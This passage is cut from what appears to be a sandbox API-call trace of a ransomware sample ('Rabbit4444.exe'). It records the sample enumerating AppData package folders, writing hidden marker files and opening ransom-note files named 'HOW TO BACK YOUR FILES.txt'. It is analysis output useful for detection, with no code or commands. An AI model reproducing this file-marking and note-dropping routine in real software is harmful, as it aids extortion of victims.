lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf102262b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf102262b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf102262b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.582] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.582] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.582] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf102262b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf102262b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf102262b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.582] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0066.582] lstrcpyW (in: lpString1=0x130ec12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.582] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.582] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.582] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.583] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.583] CloseHandle (hObject=0x27c) returned 1 [0066.583] CloseHandle (hObject=0x228) returned 1 [0066.583] GetCurrentThreadId () returned 0xd98 [0066.583] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0066.583] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState" [0066.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b888 | out: hHeap=0xe0000) returned 1 [0066.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0066.583] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState" [0066.583] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\" [0066.583] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0066.583] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.584] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.587] FlushFileBuffers (hFile=0x228) returned 1 [0066.588] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.588] CloseHandle (hObject=0x228) returned 1 [0066.588] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState") returned 106 [0066.588] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.588] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf102262b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.589] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.589] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.589] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.589] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.589] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf102262b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.589] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.589] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.589] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.589] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.589] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.589] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf102262b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf102262b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf102262b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.589] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.589] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.589] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf102262b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf102262b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf102262b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.589] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.589] lstrcpyW (in: lpString1=0x130ec0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.589] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.590] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.590] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.590] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.591] CloseHandle (hObject=0x27c) returned 1 [0066.591] CloseHandle (hObject=0x228) returned 1 [0066.591] GetCurrentThreadId () returned 0xd98 [0066.591] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0066.591] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache" [0066.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c068 | out: hHeap=0xe0000) returned 1 [0066.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0066.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache" [0066.591] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\" [0066.591] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0066.591] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.592] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.595] FlushFileBuffers (hFile=0x228) returned 1 [0066.595] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.596] CloseHandle (hObject=0x228) returned 1 [0066.596] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache") returned 106 [0066.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.596] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1047236, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0066.596] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.596] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.596] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.596] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.596] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1047236, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.597] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.597] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.597] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.597] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.597] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.597] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1047236, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1047236, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1047236, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.597] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.597] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.597] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1047236, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1047236, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1047236, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.597] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0066.597] lstrcpyW (in: lpString1=0x130ec0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.597] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.597] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.598] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.598] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.598] CloseHandle (hObject=0x27c) returned 1 [0066.598] CloseHandle (hObject=0x228) returned 1 [0066.598] GetCurrentThreadId () returned 0xd98 [0066.598] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0066.598] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData" [0066.598] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0066.598] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0066.598] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData" [0066.598] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\" [0066.598] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0066.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.600] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.602] FlushFileBuffers (hFile=0x228) returned 1 [0066.603] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.603] CloseHandle (hObject=0x228) returned 1 [0066.604] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData") returned 103 [0066.604] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.604] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1047236, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0066.605] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.605] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.605] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.605] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.605] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1047236, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.605] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.605] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.605] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.605] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.605] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.605] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1047236, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1047236, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1047236, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.605] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.605] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.605] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1047236, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1047236, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1047236, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.605] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0066.605] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.605] CreateFileW 